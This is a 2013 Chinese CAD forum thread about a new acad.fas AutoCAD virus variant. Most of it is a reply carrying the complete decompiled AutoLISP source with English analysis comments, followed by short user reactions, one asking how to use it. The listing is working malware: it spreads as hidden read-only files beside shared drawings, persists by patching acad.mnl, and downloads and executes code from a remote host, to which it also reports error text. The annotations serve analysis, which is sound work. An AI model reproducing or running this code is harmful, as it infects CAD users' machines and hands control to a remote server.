能不能破解一下二代的acad.fas
本帖最后由 Gu_xl 于 2013-11-28 16:25 编辑acad.fas新变种又出来了,好多杀毒软件不能识别。不知道这次的传播原理是什么,盼望大侠破解 (defun *ERROR* (MSG)
;; Analysis note: this is the sample's AutoLISP error handler. AutoCAD calls
;; *ERROR* with the error message whenever an AutoLISP error occurs.
;; First step: swap in a print-only handler, so a failure while this handler
;; is running is only printed instead of re-entering this body.
(defun *ERROR* (MSG) (PRINC MSG))
;; User cancellation (English or Chinese message text) is ignored quietly.
(if (or (= MSG "Function cancelled") (= MSG "函数被取消"))
(PRINC)
;; Any other error text is appended to a URL on zxb.isdun.com and passed to
;; DLCJIAN, which fetches that URL and LOADs the response. So an ordinary
;; error both reports MSG to the remote host and runs whatever it returns.
;; MSG is concatenated unescaped into the URL and into VBScript source.
(DLCJIAN (STRCAT "http://zxb.isdun.com/err/?errinfo=" MSG))
)
)
;; ZXJBEN: run the VBScript text STR through a "ScriptControl" COM object.
;; Returns the value of the VBScript variable `ret` when the statement ran
;; without error; returns nil when the object could not be created or the
;; statement raised an error. Every file and network action in this listing
;; goes through this function, so it is the sample's bridge out of AutoLISP.
;; NOTE(review): ScriptControl is, as far as I know, only registered for 32-bit
;; hosts, so on 64-bit AutoCAD this presumably always returns nil - confirm.
(defun ZXJBEN (STR)
;; #S# is a global that caches the COM object between calls.
(if (NOT #S#)
(setq #S# (vlax-create-object "ScriptControl"))
)
(if (NOT #S#)
nil
;; Prefix the script with ret="" so `ret` always exists when it is read back.
(progn (setq STR (STRCAT "ret=\"\":" STR))
(vlax-put #S# 'LANGUAGE "vbs")
;; AllowUI is set to "False" and Timeout to 20000 before the script runs.
(vlax-put #S# 'ALLOWUI "False")
(vlax-put #S# 'TIMEOUT 20000)
;; ExecuteStatement is wrapped in VL-CATCH-ALL-APPLY so a script error does
;; not surface as an AutoLISP error; the `if` has no else branch, so a
;; failed script yields nil.
(if (NOT (VL-CATCH-ALL-ERROR-P
(VL-CATCH-ALL-APPLY
'vlax-invoke-method
(LIST #S# "ExecuteStatement" STR)
)
)
)
(vlax-invoke-method #S# 'EVAL "ret")
)
)
)
)
;; ACAD20130902: main routine of the sample. Reading the code below, it
;;   1. copies acad.fas between the folder holding acad.dcl, the current
;;      drawing's folder and <AutoCAD install path>\shxfont.fas,
;;   2. once the copy is more than 3 days old, contacts zxb.isdun.com at most
;;      once per calendar day (acad.dcl's modification date is the marker),
;;   3. patches acad.mnl so that shxfont is loaded whenever acad.mnl is loaded.
;; Indicators visible in this function: hidden read-only acad.fas next to
;; drawings, shxfont.fas in the install directory, a `(load"shxfont""")` line
;; in acad.mnl, and requests to zxb.isdun.com.
(defun ACAD20130902 (/ DCL RP RF SF CF BF D LD CD XD F)
;; Turn off command echo and load the ActiveX (vlax-*) functions.
(SETVAR "cmdecho" 0)
(VL-LOAD-COM)
;; ACADLSPASDOC=1 makes AutoCAD load acad.lsp into every drawing that is opened.
(SETVAR "acadlspasdoc" 1)
;; Load acad.fas into all open documents if one is on the search path.
(if (FINDFILE "acad.fas")
(VL-LOAD-ALL "acad.fas")
)
;; RP = folder that holds acad.dcl, RF = acad.fas inside that folder.
;; NOTE(review): if acad.dcl is not found DCL is nil and the next line would
;; presumably raise an error - confirm.
(setq DCL (FINDFILE "acad.dcl"))
(setq RP (STRCAT (VL-FILENAME-DIRECTORY DCL) "\\"))
(setq RF (STRCAT RP "acad.fas"))
;; Restore RF from the shxfont.fas backup copy when RF is missing.
(if (NOT (FINDFILE RF))
(if (setq SF (FINDFILE "shxfont.fas"))
(VL-FILE-COPY SF RF)
)
)
;; Only when the current drawing exists on disk: CF = acad.fas beside the
;; drawing. Whichever of RF / CF is missing is copied from the other, then
;; given attribute value 35 (FileSystemObject bits 1+2+32: read-only, hidden,
;; archive). This is how the file travels with shared drawing folders.
(if (FINDFILE (GETVAR "dwgname"))
(progn (setq CF (STRCAT (GETVAR "dwgprefix") "acad.fas"))
(if (NOT (FINDFILE RF))
(progn (VL-FILE-COPY CF RF) (ATTRIB 35 RF))
)
(if (NOT (FINDFILE CF))
(progn (VL-FILE-COPY RF CF) (ATTRIB 35 CF))
)
)
)
;; BF = <AutoCAD install path>\shxfont.fas, created from RF if absent.
(if (NOT (FINDFILE
(setq BF (STRCAT (vlax-get (vlax-get-acad-object) 'PATH)
"\\shxfont.fas"
)
)
)
)
(VL-FILE-COPY RF BF)
)
;; Network stage, entered only when RF was created more than 3 days ago.
(if (> (CJDATE RF) 3)
(progn
;; LD = year/month/day of acad.dcl's modification time (index 2 of the
;; VL-FILE-SYSTIME list is the weekday, hence NTH 3 for the day).
(setq D (VL-FILE-SYSTIME DCL))
(setq
LD (STRCAT (ITOA (NTH 0 D)) (ITOA (NTH 1 D)) (ITOA (NTH 3 D)))
)
;; XD = today's date from CDATE, built the same way (ATOI drops leading zeros).
(setq CD (RTOS (GETVAR "cdate") 2 0))
(setq XD (STRCAT (SUBSTR CD 1 4)
(ITOA (ATOI (SUBSTR CD 5 2)))
(ITOA (ATOI (SUBSTR CD 7 2)))
)
)
;; acad.dcl not yet touched today: stamp it, then fetch and load remote code.
(if (/= LD XD)
(progn
;; Preferred stamp: set acad.dcl's modify date to Now via Shell.Application.
;; Fallback when that script fails: set attributes to 32 and append an empty
;; line to acad.dcl, which also changes its modification time.
(if
(NOT (ZXJBEN
(STRCAT
"CreateObject(\"Shell.Application\").NameSpace(\""
RP
"\").ParseName(\"acad.dcl\").Modifydate=Now"
)
)
)
(progn (ATTRIB 32 DCL)
(setq F (OPEN DCL "a"))
(WRITE-LINE "" F)
(CLOSE F)
)
)
;; DLCJIAN downloads this URL's response and LOADs it (see DLCJIAN).
(DLCJIAN "http://zxb.isdun.com/jbbgxf/?f=xshcxgx")
)
)
)
)
;; Persistence: the VBScript reads acad.mnl and, if it does not yet contain
;; the text (load"shxfont"""), inserts that text before the first "(defun".
;; Attributes are set to 32 before the write and to 33 (read-only + archive)
;; afterwards.
(ZXJBEN
(STRCAT
"set fso=CreateObject(\"Scripting.FileSystemObject\"):f1=\""
(FINDFILE "acad.mnl")
"\":s0=fso.OpenTextFile(f1,1).ReadAll:s1=\"(load\"\"shxfont\"\"\"\"\"\")\":s2=\"(defun\":If InStr(s0,s1)=0 Then:fso.GetFile(f1).Attributes=32:s0=Replace(s0,s2,vbCrLf&s1&s2,1,1):Set f=fso.OpenTextFile(f1,2):f.Write s0:f.Close:fso.GetFile(f1).Attributes=33:End If"
)
)
)
;; DLCJIAN: fetch URL and execute the response as AutoLISP.
;; The response body is saved as <AutoCAD install path>\draw.fas, loaded, and
;; the file is deleted straight away, so the downloaded code is on disk only
;; for the duration of the LOAD. What the sample ultimately does therefore
;; depends on what the remote host serves, which this listing does not show.
(defun DLCJIAN (URL / ZXCJ)
(setq ZXCJ (STRCAT (vlax-get (vlax-get-acad-object) 'PATH)
"\\draw.fas"
)
)
;; VBScript: HTTP GET through Microsoft.XMLHTTP (third Open argument 0, i.e.
;; not asynchronous), then ADODB.Stream with Type=1 writes responseBody to
;; ZXCJ; SaveToFile option 2 overwrites an existing file.
(ZXJBEN
(STRCAT
"\n\t\tSet X=CreateObject(\"Microsoft.XMLHTTP\")\n\t\tX.Open \"GET\",\""
URL
"\",0\n\t\tX.Send()\n\t\tSet G=CreateObject(\"ADODB.Stream\")\n\t\tG.Mode=3\n\t\tG.Type=1\n\t\tG.Open()\n\t\tG.Write(X.responseBody)\n\t\tG.SaveToFile \""
ZXCJ "\",2")
)
;; LOAD is wrapped so a missing or invalid download does not raise an error.
(VL-CATCH-ALL-APPLY 'LOAD (LIST ZXCJ))
(VL-FILE-DELETE ZXCJ)
;; ZXCJRXHS is not defined in this listing; presumably the downloaded file
;; defines it as its entry point - confirm against a captured payload.
(if ZXCJRXHS
(ZXCJRXHS)
)
)
;; ATTRIB: set the file attributes of FILE to the integer SXZ through
;; Scripting.FileSystemObject. Values used by callers in this listing:
;; 32 (archive only, clears read-only/hidden) and 35 (read-only + hidden +
;; archive). Returns whatever ZXJBEN returns (nil when the script failed).
(defun ATTRIB (SXZ FILE)
(ZXJBEN
(STRCAT
"set fso=CreateObject(\"Scripting.FileSystemObject\"):fso.GetFile(\""
FILE
"\").Attributes="
(ITOA SXZ)
)
)
)
;; CJDATE: return the number of days between FILE's creation date and now,
;; computed in VBScript with DateDiff("d", DateCreated, Now).
(defun CJDATE (FILE / R)
(setq R
(ZXJBEN
(STRCAT
"set fso=CreateObject(\"Scripting.FileSystemObject\"):ret=DateDiff(\"d\",fso.GetFile(\""
FILE
"\").DateCreated,Now)"
)
)
)
;; When the script failed (R is nil) ERROR-FDIF is called. That function is
;; not defined anywhere in this listing, so the call would raise an AutoLISP
;; error and reach the *ERROR* handler - presumably on purpose; confirm.
(if R
R
(ERROR-FDIF)
)
)
;; WORKING: run ACAD20130902 once; the global flag BS20130902 is set before
;; the call so later loads of this file skip the routine while the flag lives.
(defun WORKING nil (if (NULL BS20130902) (progn (setq BS20130902 T) (ACAD20130902))))
;; Executed at load time: this call is what starts the sample when the .fas is loaded.
(WORKING)
;; After the run the reporting *ERROR* handler is replaced by one that only
;; prints the message, so later errors no longer reach DLCJIAN.
(defun *ERROR* (MSG) (PRINC MSG) (PRINC))
(PRINC)
牛逼,写病毒的应该研究的都很深啊,破解的更牛逼 nzl1116 发表于 2013-11-28 20:06
怎么用法?好像还缺个(ERROR-FDIF)函数 做个记号,用到时找 完美反编译了啊这是 看到这个直接全盘删,管他什么杀毒软件。。。 二楼才是真牛,完美反编译啊。 一听是病毒,吓得我赶紧走人 厉害。。。。